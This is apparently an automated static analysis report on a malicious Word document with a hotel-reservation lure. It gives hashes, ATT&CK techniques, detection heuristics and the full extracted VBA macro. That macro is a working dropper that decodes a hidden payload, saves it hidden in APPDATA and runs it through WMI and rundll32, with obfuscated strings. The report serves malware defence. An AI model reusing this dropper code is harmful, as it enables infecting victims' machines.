Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4a455db9f297e2b…

MALICIOUS

Office (OOXML)

Size: 76.8 KB
Created: 2017-07-03 05:33:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2018-11-05
MD5: 9b10685b774a783eabfecdb6119a8aa3
SHA-1: f293a2bfb728060c54efeeb03c5323893b5c80df
SHA-256: a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
Risk Score: 430

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro executes a payload using CreateObject and GetObject calls, specifically leveraging WMI to launch a process. The document body is a lure for hotel reservations, aiming to collect credit card information. The VBA macro is designed to download and execute a second-stage payload, as indicated by the use of WMI to create a process.

Heuristics (10)

  • ClamAV: Doc.Malware.Emodldr-10029363-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10029363-0
  • VBA project inside OOXML [medium, 7 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3940 bytes
SHA-256: 56c969cf57f82bb252140dca1f47ca971bb5c098a7e5630e3bf0323be3ad7226
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Execute
End Sub

Private Function DecodeBase64(base64) As Byte()
    Const decodeTable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
          
    If 0 <> Len(base64) Mod 4 Then
        Exit Function
    End If
      
    outputLen = (Len(base64) / 4) * 3
    If "=" = Mid(base64, Len(base64), 1) Then
        outputLen = outputLen - 1
    End If
    If "=" = Mid(base64, Len(base64) - 1, 1) Then
        outputLen = outputLen - 1
    End If
      
    Dim decodedBytes() As Byte
    ReDim decodedBytes(outputLen - 1)
    outputIndex = 0
          
    For quartet = 1 To Len(base64) Step 4
        groupBase64Number = 0
        Const base = 64
        realBytesInThisGroup = 3
        For i = 0 To 3
           inputChar = Mid(base64, quartet + i, 1)
           indexInTable = 0
        
           If "=" = inputChar Then
                realBytesInThisGroup = realBytesInThisGroup - 1
           Else
                indexInTable = InStr(1, decodeTable, inputChar, vbBinaryCompare) - 1
           End If
                 
           If -1 = indexInTable Then
                Exit Function
           End If
             
           groupBase64Number = (groupBase64Number * base) + indexInTable
        Next
      
        groupBase64Number = Hex(groupBase64Number)
            
        'add leading zeroes, lengt of hex = 6:
         groupBase64Number = String(6 - Len(groupBase64Number), "0") & groupBase64Number
            
        'split hex number into 3 groups, 2 hex characters each:
        decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 1, 2))
        outputIndex = outputIndex + 1
        If realBytesInThisGroup > 1 Then
            decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 3, 2))
            outputIndex = outputIndex + 1
            If realBytesInThisGroup > 2 Then
                decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 5, 2))
                outputIndex = outputIndex + 1
            End If
        End If
    Next
      
    DecodeBase64 = decodedBytes
End Function
     
Private Sub Execute()
    Dim Path As String
    Dim FileNum As Long
    Dim xml() As Byte
    Dim bin() As Byte
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    
    'extract and decode encoded file
    xml = ActiveDocument.WordOpenXML
    Set xmlParser = CreateObject("Msxml2.DOMDocument")
    If Not xmlParser.LoadXML(xml) Then
        Exit Sub
    End If
    Set currNode = xmlParser.DocumentElement
    Set selected = currNode.SelectNodes("//HLinks" & "/vt:" & "vector" & "/vt:" & "variant" & "/vt:" & "lpwstr")
    If 2 > selected.Length Then
        Exit Sub
    End If
    base64 = selected(1).Text
    bin = DecodeBase64(base64)

    'save decoded file
    Path = Environ("APPDATA") + "\" + "user" + ".dat"
    FileNum = FreeFile
    If Dir(Path, vbHidden) <> "" Then
        Exit Sub
    End If
    Open Path For Binary Access Write As #FileNum
    Put #FileNum, 1, bin
    Close #FileNum
    SetAttr Path, vbHidden
        
    'execute saved file with WMI
    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
    objProcess.Create "run" + "dll" + "32" + ".exe " + Path + ", " + "#1", Null, objConfig, intProcessID

End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 15872 bytes
SHA-256: 3326bdc2007d32cb314968ecccc0735fd05718339058327e564cdc069d369f72
Detection
ClamAV: Doc.Malware.Emodldr-10029363-0
Obfuscation or payload: unlikely